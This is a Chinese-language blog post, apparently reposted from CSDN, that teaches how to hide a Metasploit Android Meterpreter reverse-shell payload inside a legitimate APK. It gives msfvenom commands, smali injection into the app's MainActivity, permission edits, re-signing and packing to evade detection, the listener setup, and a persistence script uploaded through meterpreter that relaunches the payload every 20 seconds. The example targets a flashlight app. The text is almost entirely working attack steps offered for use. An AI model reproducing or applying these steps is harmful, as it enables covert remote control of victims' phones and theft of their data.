payload注入android APK教程

参考了网络很多大神文章,简单小结一下,仅供参考
1,msfvenom -p android/meterpreter/reverse_tcp LHOST=本机IP  LPORT=监听端口号 -o virus.apk
2,apktook反编译virus.apk和normal.apk
3,找normal.apk入口,normal.apk的androidManifest.xml文件中查找MainActivety和Launch关键词,
4,找到com/xxx/xxx/MainActivety.smail文件并搜索onCreat函数,找到bundle对象在下面添加启动payload:  invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
5,把virus.apk的smail文件(payload的smail/com/metasploit文件),复制到normal.apk的smail/com/目录下
6,androidManifest.xml 添加权限permission
7,回编译       //https://blog.csdn.net/weixin_44212888/article/details/111396635
8,签名        //https://blog.csdn.net/weixin_44212888/article/details/111396635
9,加壳       //百度"加壳工具"
10,service postgresql start  //启动数据库
11,msfconsole    //启动msf
12,use exploit/multi/handler     //加载攻击模块
13,set payload android/meterpreter/reverse_tcp  //选择要使用的Payload
14,show options //查看需要设置的参数
15,exploit     //执行
16,持续监听编写一个sh脚本,保存桌面并赋权限
#! /bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN(action标签) -n com.metasploit.stage/.MainActivity
sleep 20
done
meterpreter > pwd         //找到当前路径
meterpreter > upload /root/桌面/chixu.sh        //上传脚本
meterpreter > shell                            //输入shell 
pwd
/
cd /data/user/0/com.baidu.flashlight/files     //找到脚本所在文件夹
ls
chixu.sh
sh chixu.sh                //运行脚本
msf支持上线自动执行命令,设置InitialAutoRunScript或autorunscript可以让你上线的session自动上传并执行脚本

猜你喜欢

转载自blog.csdn.net/weixin_44212888/article/details/114109947